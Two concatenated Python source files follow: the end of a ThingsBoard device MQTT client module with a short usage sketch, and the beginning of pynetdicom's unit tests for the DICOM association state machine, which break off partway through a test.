if self.__device_sub_dict.get("*"):
for subscription_id in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][subscription_id])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for subscription in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][subscription])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=None, wait_for_publish=False):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=self.quality_of_service)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos is None:
qos = self.quality_of_service
if qos not in (0, 1):
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for attribute in self.__device_sub_dict:
if self.__device_sub_dict[attribute].get(subscription_id):
del self.__device_sub_dict[attribute][subscription_id]
log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(attr_request_number),
payload=dumps(msg),
qos=self.quality_of_service)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, timestamp):
self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
else:
time.sleep(0.01)
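# Minimal usage sketch (not part of the original module). It assumes a reachable
# ThingsBoard instance; the host and access token below are placeholders.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    def on_attributes(content, exception):
        # Called with the requested attributes, or with a TBTimeoutException on timeout.
        if exception is not None:
            log.error("Attribute request failed: %s", exception)
        else:
            log.info("Received attributes: %s", content)

    client = TBDeviceMqttClient("thingsboard.example.com", token="ACCESS_TOKEN")
    client.connect()
    # publish_data() returns a TBPublishInfo; get() blocks until the message is published.
    client.send_telemetry({"temperature": 21.5}).get()
    client.request_attributes(shared_keys=["targetTemperature"], callback=on_attributes)
    time.sleep(1)
    client.disconnect()
    client.stop()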
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .dummy_c_scp import DummyVerificationSCP, DummyBaseSCP
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
class BadDUL(object):
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine(object):
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase(object):
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
for thread in threading.enumerate():
if isinstance(thread, ThreadedParrot):
thread.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt19']
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
